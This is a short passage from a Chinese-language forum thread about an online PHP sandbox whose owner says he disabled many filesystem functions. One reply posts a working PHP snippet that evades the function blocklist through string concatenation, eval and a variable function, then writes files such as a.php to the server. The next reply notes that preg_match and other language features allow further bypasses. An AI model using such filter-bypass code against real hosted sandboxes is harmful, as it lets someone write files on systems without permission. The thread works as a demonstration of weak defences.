3. wuming.boxhost.me/lianxi/ 嘿嘿,为了安全,禁用了大量文件系统类函数,凑和着用吧
4. 看了二楼的话,我傻眼了,木有,楼下的是在线版。。
5.
@无-名,完爆。
<?php
var_dump(eval('return fil'.'e_put_contents("a.txt","bbbb");'));
$x='fi'.'le_put_contents';
$x('a.php','kill');
var_dump(glob('./*'));
?>
6. 除了这两种方法,还可以利用preg_match等许多php函数、类和语言特性来突破你的简单封锁。所以,除非你完全禁用本地写(将权限设为只读并取消chmod权限),否则无法保证本地文件的安全。
@无-名